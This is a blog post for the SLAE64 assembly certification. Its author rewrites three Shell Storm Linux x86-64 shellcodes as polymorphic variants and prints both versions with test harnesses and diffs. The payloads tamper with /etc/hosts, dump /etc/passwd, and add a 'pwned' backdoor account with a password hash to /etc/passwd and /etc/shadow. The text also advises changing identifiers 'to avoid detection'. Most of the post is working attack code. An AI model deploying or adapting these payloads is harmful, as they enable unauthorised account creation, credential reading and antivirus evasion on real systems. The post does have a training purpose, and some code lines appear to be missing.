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Assignment #6 – Writing polymorphic shellcodes

In this assignment I had to choose three shellcodes from Shell Storm and write polymorphic versions of them. Bonus points if your version is smaller than the original. I chose the following:

  • Linux/x86-64 - Add map in /etc/hosts file - 110 bytes by Osanda Malith Jayathissa
  • Linux/x86-64 - Read /etc/passwd - 82 bytes by Mr.Un1k0d3r
  • Linux/x86-64 - Add user and password with echo cmd - 273 bytes by Christophe G

Add map in /etc/hosts file - 110 bytes by @OsandaMalith

The original shellcode can be found here. It is reproduced below.

Doing a quick reverse we find this shellcode adds an entry to /etc/hosts, in this case

; Title: Add map in /etc/hosts file - 110 bytes
; Date: 2014-10-29
; Platform: linux/x86_64
; Website:
; Author: Osanda Malith Jayathissa (@OsandaMalith)

global _start
    section .text

    xor rax, rax 
    add rax, 2  ; open syscall
    xor rdi, rdi
    xor rsi, rsi
    push rsi ; 0x00 
    mov r8, 0x2f2f2f2f6374652f ; stsoh/
    mov r10, 0x7374736f682f2f2f ; /cte/
    push r10
    push r8
    add rdi, rsp
    xor rsi, rsi
    add si, 0x401

    xchg rax, rdi
    xor rax, rax
    add rax, 1 ; syscall for write
    jmp data

    pop rsi 
    mov dl, 19 ; length in rdx

    xor rax, rax
    add rax, 3

    xor rax, rax
    mov al, 60
    xor rdi, rdi

    call write
    text db ''

My polymorphic version can be seen below. The first part was heavily altered and multiple size optimisations were introduced. The remaining parts had some instructions substituted by equivalent ones and some more optimisations (say xor eax, eax instead of xor rax, rax). In the end my polymorphic version works as the original but was cut from 110 bytes to 85. Neither the original nor my version include null bytes.

global _start
    section .text

    ; rdi = *pathname
    ; rsi = 0x0401
    ; rax = 2
    push 2
    pop rax
    xor edi, edi
    push rdi                     ; null byte, terminate string
    push 0x7374736f              ; rax2 -S $(echo osts | rev)
    mov r9, 0x682f6374652f2f2f   ; rax2 -S $(echo ///etc/h | rev)
    push r9
    mov rdi, rsp
    push word 0x0401             ; O_WRONLY|O_APPEND
    pop si

    mov edi, eax
    xor eax, eax
    inc rax                      ; syscall for write
    jmp data

    pop rsi
    mov dl, 19                   ; length in rdx

    sub eax, eax
    add eax, 3

    ;xor eax, eax                ; already done by close
    add al, 60
    xor edi, edi

    call write
    text db ''

#include <stdio.h>
#include <string.h>

char code[] =

int main() {
    printf("length: %lu\n", strlen(code));
    ((int(*)()) code)();


$ diff <(nasm -E shellcode-896_add-map-in-etc-hosts.nasm) <(nasm -E shellcode-896_add-map-in-etc-hosts_polymorph.nasm) | grep -v "^[<>] $"

< %line 1+1 shellcode-896_add-map-in-etc-hosts.nasm
> %line 1+1 shellcode-896_add-map-in-etc-hosts_polymorph.nasm
<  xor rax, rax
<  add rax, 2
<  xor rdi, rdi
<  xor rsi, rsi
<  push rsi
<  mov r8, 0x2f2f2f2f6374652f
<  mov r10, 0x7374736f682f2f2f
<  push r10
<  push r8
<  add rdi, rsp
<  xor rsi, rsi
<  add si, 0x401
>  push 2
>  pop rax
>  xor edi, edi
>  push rdi
>  push 0x7374736f
>  mov r9, 0x682f6374652f2f2f
>  push r9
>  mov rdi, rsp
>  push word 0x0401
>  pop si
<  xchg rax, rdi
<  xor rax, rax
<  add rax, 1
>  mov edi, eax
>  xor eax, eax
>  inc rax
<  xor rax, rax
<  add rax, 3
>  sub eax, eax
>  add eax, 3
<  xor rax, rax
<  mov al, 60
<  xor rdi, rdi
>  add al, 60
>  xor edi, edi

Read /etc/passwd - 82 bytes by Mr.Un1k0d3r

The original shellcode can be found here. It is reproduced below. It simply opens /etc/passwd, reads its contents and writes them to stdout. The shellcode has no null bytes.

; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start

section .text

jmp _push_filename

; syscall open file
pop rdi ; pop path value
; NULL byte fix
xor byte [rdi + 11], 0x41

xor rax, rax
add al, 2
xor rsi, rsi ; set O_RDONLY flag

; syscall read file
sub sp, 0xfff
lea rsi, [rsp]
mov rdi, rax
xor rdx, rdx
mov dx, 0xfff; size to read
xor rax, rax

; syscall write to stdout
xor rdi, rdi
add dil, 1 ; set stdout fd = 1
mov rdx, rax
xor rax, rax
add al, 1

; syscall exit
xor rax, rax
add al, 60

call _readfile
path: db "/etc/passwdA"

My polymorphic version is below. Other than equivalent (sometimes shorter) instructions substitutions the read part was a bit reworked to shorten it a bit. Also, the terminating character of the file path was replaced. The polymorphic version does not have null bytes either. The original shellcode is 82 bytes long, while the polymorphic version is 71.

global _start
section .text

    jmp _push_filename

    ; open
    pop rdi                     ; pop path value
    xor byte [rdi + 11], 0x5a   ; add null byte to string

    xor eax, eax
    xor esi, esi                ; set O_RDONLY flag
    mov al, 2                   ; __NR_open = 2

    ; read
    xor edx, edx
    mov dx, 0xffe               ; size to read
    sub rsp, rdx
    mov rsi, rsp
    mov rdi, rax
    sub eax, eax                ; __NR_read = 0

    ; write
    xor edi, edi
    inc dil                     ; stdout fd = 1
    mov rdx, rax
    xor eax, eax
    inc al                      ; __NR_write = 1

    ; exit
    sub eax, eax
    mov al, 60

    call _readfile
    path: db "/etc/passwdZ"

#include <stdio.h>
#include <string.h>

char code[] =

int main() {
    printf("length: %lu\n", strlen(code));
    ((int(*)()) code)();


$ diff <(nasm -E shellcode-878_read-etc-passwd.nasm) <(nasm -E shellcode-878_read-etc-passwd_polymorph.nasm) | grep -v "^[<>] $"

< %line 1+1 shellcode-878_read-etc-passwd.nasm
< [bits 64]
> %line 1+1 shellcode-878_read-etc-passwd_polymorph.nasm
> xor byte [rdi + 11], 0x5a
< xor byte [rdi + 11], 0x41
< xor rax, rax
< add al, 2
< xor rsi, rsi
> xor eax, eax
> xor esi, esi
> mov al, 2
< sub sp, 0xfff
< lea rsi, [rsp]
> xor edx, edx
> mov dx, 0xffe
> sub rsp, rdx
> mov rsi, rsp
< xor rdx, rdx
< mov dx, 0xfff
< xor rax, rax
> sub eax, eax
< xor rdi, rdi
< add dil, 1
> xor edi, edi
> inc dil
< xor rax, rax
< add al, 1
> xor eax, eax
> inc al
< xor rax, rax
< add al, 60
> sub eax, eax
> mov al, 60
< path: db "/etc/passwdA"
> path: db "/etc/passwdZ"

Add user and password with echo cmd - 273 bytes by Christophe G

The original shellcode can be found here. It is reproduced below. It uses execve to execute /bin/sh -c echo ... to add a new line to both /etc/passwd and /etc/shadow. The line added to passwd just has a reference to a new user, while on shadow a hash is added corresponding to the password of the added user. The number of instructions is short, most of the size comes from the string with the commands.

; shellcode name add_user_password
; Author    : Christophe G SLAE64-1337
; Len       : 273 bytes
; Language  : Nasm
; "name = pwned ; pass = $pass$"
; add user and password with echo cmd
; tested kali linux , kernel 3.12

global _start
        jmp short findaddress

        pop rdi
        xor byte [rdi + 7] , 0x41 ; replace A to null byte "/bin/shA"
        xor byte [rdi + 10]  ,0x41 ; same "-cA"
        xor rdx , rdx
        lea rdi , [rdi]
        lea r9 , [rdi + 8]
        lea r10 , [rdi + 11]
        push rdx
        push r10
        push r9
        push rdi
        mov rsi , rsp
        add al , 59

        call _realstart
        string : db "/bin/shA-cAecho pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash >> /etc/passwd ; echo pwned:\$6\$uiH7x.vhivD7LLXY\$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7::: >> /etc/shadow"

My polymorphic version is below. In the string I substituted A with Z. Then I changed the way in which Z was xored out of the string, including substituting R8 and R10 for ones that result in shorter opcodes. Finally I removed uneeded spaces from the command string, namely around >> and ;. I opted to leave the user, IDs and hash unaltered, but if you actually use this shellcode and want to avoid detection it should be a good idea to change that. I added a comment on how to change the password. The original shellcode was 273 bytes long, while the polymorphic one is 266. Should you need to further reduce size, my bet would be to change the hashing algorithm of the password to MD5 (-1) or crypt (-crypt), which result in much shorter hashes (with the downside that the hash becomes much easier to crack).

global _start
    jmp short findaddress

    pop rdi
    push 0x5a
    pop rax
    lea rbx, [rdi + 8]
    lea rcx, [rdi + 11]
    xor byte [rbx-1], al     ; replace Z with null byte in "/bin/shZ"
    xor byte [rcx-1], al     ; same for "-cZ"

    push rdx                 ; NULL
    push rcx                 ; command
    push rbx                 ; "-c"
    push rdi                 ; "/bin/sh"
    push rsp
    pop rsi
    mov al, 59               ; __NR_execve

    call _realstart
    string : db "/bin/shZ-cZecho pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash>>/etc/passwd;echo pwned:\$6\$uiH7x.vhivD7LLXY\$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::>>/etc/shadow"
    ; you can generate new hashes with:
    ; echo '$pass$' | openssl passwd -stdin -6 | sed -e 's/\$/\\$/g'

#include <stdio.h>
#include <string.h>

char code[] =

int main() {
    printf("length: %lu\n", strlen(code));
    ((int(*)()) code)();


$ diff <(nasm -E shellcode-879_add-user-and-password-with-echo.nasm) <(nasm -E shellcode-879_add-user-and-password-with-echo_polymorph.nasm) | grep -v "^[<>] $"  | yank

< %line 1+1 shellcode-879_add-user-and-password-with-echo.nasm
> %line 1+1 shellcode-879_add-user-and-password-with-echo_polymorph.nasm
<  xor byte [rdi + 7] , 0x41
<  xor byte [rdi + 10] ,0x41
<  xor rdx , rdx
<  lea rdi , [rdi]
<  lea r9 , [rdi + 8]
<  lea r10 , [rdi + 11]
>  push 0x5a
>  pop rax
>  lea rbx, [rdi + 8]
>  lea rcx, [rdi + 11]
>  xor byte [rbx-1], al
>  xor byte [rcx-1], al
>  cdq
<  push r10
<  push r9
>  push rcx
>  push rbx
<  mov rsi , rsp
<  add al , 59
>  push rsp
>  pop rsi
>  mov al, 59
<  string : db "/bin/shA-cAecho pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash >> /etc/passwd ; echo pwned:\$6\$uiH7x.vhivD7LLXY\$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7::: >> /etc/shadow"
>  string : db "/bin/shZ-cZecho pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash>>/etc/passwd;echo pwned:\$6\$uiH7x.vhivD7LLXY\$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::>>/etc/shadow"

And that's all for this one.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64-1635